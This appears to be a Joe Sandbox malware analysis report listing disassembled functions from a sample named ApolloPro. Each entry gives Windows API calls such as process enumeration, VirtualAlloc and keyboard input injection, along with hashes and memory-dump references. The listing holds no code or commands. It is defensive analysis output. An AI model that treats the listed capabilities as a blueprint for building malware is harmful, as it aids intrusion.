                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 2574300362-199464113
                                                                                              • Opcode ID: 9c37f3c775d5cc1aa574a13737926ede794a12622c4ca4e8776884c3d43f023c
                                                                                              • Instruction ID: 3a1c2721c54f2d1d62b05568ec144fd6e3f999987443b90563577a7ac5f8c588
                                                                                              • Opcode Fuzzy Hash: 9c37f3c775d5cc1aa574a13737926ede794a12622c4ca4e8776884c3d43f023c
                                                                                              • Instruction Fuzzy Hash: 9CD01270510713CFE7205F71D888A56B6D6AF05795F25A82DD485D2650DF70C880CA21
                                                                                              Function 00687D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29be2bb22d02d7fe2c1e7dea9da9d085459d662dd6b71737e5a0d51c192c6c2b
                                                                                              • Instruction ID: 3eb0220a10d3a4cc3bd36c621ea4d7a385df7034c845275bb495701b8cd8bc1d
                                                                                              • Opcode Fuzzy Hash: 29be2bb22d02d7fe2c1e7dea9da9d085459d662dd6b71737e5a0d51c192c6c2b
                                                                                              • Instruction Fuzzy Hash: 3CC18F74A00216EFCB14DF94C884EAEB7B6FF48714B208698E905EB351DB31ED81CB90
                                                                                              Function 006AE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 006AE7A7
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 006AE7EA
                                                                                                • Part of subcall function 006ADE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006ADEAE
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006AE9EA
                                                                                              • _memmove.LIBCMT ref: 006AE9FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3659485706-0
                                                                                              • Opcode ID: 729bdb26b7aec364a4e0862785e84226a576ff59a1019a8a8c1e549c8e68e367
                                                                                              • Instruction ID: 3c2e223eff614d0873730969e09a7114e040987b0dfce55642264ed1b6362134
                                                                                              • Opcode Fuzzy Hash: 729bdb26b7aec364a4e0862785e84226a576ff59a1019a8a8c1e549c8e68e367
                                                                                              • Instruction Fuzzy Hash: C6C11671A043019FC754EF28C48096ABBE6FF8A714F14896EE8999B351D731ED46CF82
                                                                                              Function 006A877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 006A87AD
                                                                                              • CoUninitialize.OLE32 ref: 006A87B8
                                                                                                • Part of subcall function 006BDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,006A8A0E,?,00000000), ref: 006BDF71
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A87C3
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A8A94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 780911581-0
                                                                                              • Opcode ID: 12c6c7101dfc775f30d57c8dd601319ca68133a3f5d6c797b8fa5d5943921bc2
                                                                                              • Instruction ID: fda3b9c2e26a1da4b786a3816ac349b187081f1d76d7e271fb0853f9a02f867d
                                                                                              • Opcode Fuzzy Hash: 12c6c7101dfc775f30d57c8dd601319ca68133a3f5d6c797b8fa5d5943921bc2
                                                                                              • Instruction Fuzzy Hash: FFA11275604B019FD750EF14C881A6AB7E6BF89310F14884DFA969B3A2CB34ED05CF96
                                                                                              Function 0068814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688308
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688320
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,006C0988,000000FF,?,00000000,00000800,00000000,?,006C3C4C,?), ref: 00688345
                                                                                              • _memcmp.LIBCMT ref: 00688366
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: 573f48ec0c352d2b1c73d2ccb0639ecff8321036e07cb950b1cd3d0be4b0220a
                                                                                              • Instruction ID: 2a6144dcc85809ca4ea9a4495dc9a3a622e9d6ed210febb9a8102c6bf9b24e83
                                                                                              • Opcode Fuzzy Hash: 573f48ec0c352d2b1c73d2ccb0639ecff8321036e07cb950b1cd3d0be4b0220a
                                                                                              • Instruction Fuzzy Hash: 1A811C75A00109EFCB04DFD4C984EEEB7BAFF89315F244558E505AB250DB71AE46CBA0
                                                                                              Function 0068749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              • Opcode ID: 2967f19ac2841514e28e51b1504f8b772d8cd12b349751a496ede6bb59d31891
                                                                                              • Instruction ID: d3eb1b58ec5f88377878d3e0cfe8ee78a071be41033b67283f2bcd5a47ae47d8
                                                                                              • Opcode Fuzzy Hash: 2967f19ac2841514e28e51b1504f8b772d8cd12b349751a496ede6bb59d31891
                                                                                              • Instruction Fuzzy Hash: 7751C8306087029BDB64BF79D895A6DB3E7AF54310F309A1FE546C76A1EF70D8818709
                                                                                              Function 006AF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 006AF526
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 006AF534
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 006AF5F4
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006AF603
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2576544623-0
                                                                                              • Opcode ID: cfa2a6bee69843a81e91b967812302e1684cd1021d853d24bc3f831179bd4843
                                                                                              • Instruction ID: e70622ebce81de81c7325c0718eb90f37fcc30ee7c37e8baa3eed82d1e5b5e89
                                                                                              • Opcode Fuzzy Hash: cfa2a6bee69843a81e91b967812302e1684cd1021d853d24bc3f831179bd4843
                                                                                              • Instruction Fuzzy Hash: E0519DB15043009FD350EF60DC85E6BBBEAEF95700F00492DF595972A1EB70AA44CB96
                                                                                              Function 006B9E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006B9E88
                                                                                              • ScreenToClient.USER32(00000002,00000002), ref: 006B9EBB
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006B9F28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 271eb68b752bd27b76fb87f4fa9884a3ea0a3126f4ff9532f6800b5e64fd35ec
                                                                                              • Instruction ID: b457745f0bf3485e8786522735473b8d5a850b664283e5fe24368d6a6438519a
                                                                                              • Opcode Fuzzy Hash: 271eb68b752bd27b76fb87f4fa9884a3ea0a3126f4ff9532f6800b5e64fd35ec
                                                                                              • Instruction Fuzzy Hash: EB510A74A00109AFDB14DF54C8849FA7BB6EF45360F108569F965D73A0D730AD91CBA0
                                                                                              Function 0065492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                                                              • Instruction ID: f7a4df0fc3f9863b9bc14f7a89cf3fe0723ee65ac6cd049c2f52f3515bd32629
                                                                                              • Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                                                              • Instruction Fuzzy Hash: 7E4106316007069BDF688E69C8819EF77A7AF4036AF2481BDEC5587784DF309DC98B44
                                                                                              Function 0068A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0068A68A
                                                                                              • __itow.LIBCMT ref: 0068A6BB
                                                                                                • Part of subcall function 0068A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0068A976
                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0068A724
                                                                                              • __itow.LIBCMT ref: 0068A77B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              • Opcode ID: 441eee26e51b5f98911b9e77065509d7cecf12dbc771fed302428b253bd89acb
                                                                                              • Instruction ID: 2afd00235a955ebb44f9396550bf1719b21114ef9a367c06e4716d60199260cb
                                                                                              • Opcode Fuzzy Hash: 441eee26e51b5f98911b9e77065509d7cecf12dbc771fed302428b253bd89acb
                                                                                              • Instruction Fuzzy Hash: 9F417174A00309ABEF11EF94C855BEE7BBAAB45750F04011AFD05A7381DB709A85CBA6
                                                                                              Function 006A7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 006A70BC
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A70CC
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006A7130
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A713C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                                                              • String ID:
                                                                                              • API String ID: 2214342067-0
                                                                                              • Opcode ID: c6efc2e2759899ac3fbd84afc09737271b4ea2ef3875c8f9827d73aa8f37e001
                                                                                              • Instruction ID: ac0e2458aad5faea768e85fdcf445098f8d14d76a27433ef25ccdb4e290d7bdd
                                                                                              • Opcode Fuzzy Hash: c6efc2e2759899ac3fbd84afc09737271b4ea2ef3875c8f9827d73aa8f37e001
                                                                                              • Instruction Fuzzy Hash: F641AE71740200AFEB64BF24DC86F7AB7E69F04B14F04845CFA59AB3C2DA70AD018B95
                                                                                              Function 006A6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006C0980), ref: 006A6B92
                                                                                              • _strlen.LIBCMT ref: 006A6BC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              • Opcode ID: 0d4c4fd225cbda1abbc8a47fb33236825d1ee9fdcd435023e1368398f1df5d78
                                                                                              • Instruction ID: a0743ae31703eb7698d0ee680c59128a9e6917331d1050b59573ee97a9269588
                                                                                              • Opcode Fuzzy Hash: 0d4c4fd225cbda1abbc8a47fb33236825d1ee9fdcd435023e1368398f1df5d78
                                                                                              • Instruction Fuzzy Hash: D2418071A00104ABDB54FB64DC95EAEB3ABEF55310F188159F81A9B292DF30AD41CB94
                                                                                              Function 0069BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0069BEE1
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0069BF07
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0069BF2C
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0069BF58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: cc76ddda6066c174276e82cec2ac40691ca986f8ae67a667bd90636acf5512ee
                                                                                              • Instruction ID: 8e93984ca1b9448f6a6960c277ca40d97b46912f0497af54bc6528ee22167cee
                                                                                              • Opcode Fuzzy Hash: cc76ddda6066c174276e82cec2ac40691ca986f8ae67a667bd90636acf5512ee
                                                                                              • Instruction Fuzzy Hash: 81415A35600A10DFCB51EF15C985A59BBE6EF89320F08C488E84A9B762CB74FD02CF95
                                                                                              Function 006B8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006B8F03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 81393bb5b5cf0401daea33014740da4b6f5284f65665160546f06c301648e6f4
                                                                                              • Instruction ID: 3fc4d2932feb5d9c2ce8da8c0dd770d203cb99798cfaab3ae552bde4319811e8
                                                                                              • Opcode Fuzzy Hash: 81393bb5b5cf0401daea33014740da4b6f5284f65665160546f06c301648e6f4
                                                                                              • Instruction Fuzzy Hash: 13318AB4604209EEEB209E18CC49BF837AFEB063A0F144512FA11D72A1CF71EAD1DB51
                                                                                              Function 006BB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BB1D2
                                                                                              • GetWindowRect.USER32(?,?), ref: 006BB248
                                                                                              • PtInRect.USER32(?,?,006BC6BC), ref: 006BB258
                                                                                              • MessageBeep.USER32(00000000), ref: 006BB2C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: a0fb20f00ae88ca06343fc3600d059b4d24c1bb17064efd0b710a603591fd187
                                                                                              • Instruction ID: ab471963c97fa09e4aee08585e8eaee0fc1856ade761c5a97c478fea0a7887a8
                                                                                              • Opcode Fuzzy Hash: a0fb20f00ae88ca06343fc3600d059b4d24c1bb17064efd0b710a603591fd187
                                                                                              • Instruction Fuzzy Hash: C0415DB0A04119DFDF11CF98C884AFD7BF6FF49351F1491A9E8689B251D7B0AA81CB50
                                                                                              Function 006912D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00691326
                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00691342
                                                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006913A8
                                                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006913FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 91661668ab6fcc49b05e640ea05d5398c3ff3bb38a17f1195d420285b90e57c5
                                                                                              • Instruction ID: 3dafd283f5188a4eb564d069303e69428f27cb3993b221a6a68bb53a8ef0dbbb
                                                                                              • Opcode Fuzzy Hash: 91661668ab6fcc49b05e640ea05d5398c3ff3bb38a17f1195d420285b90e57c5
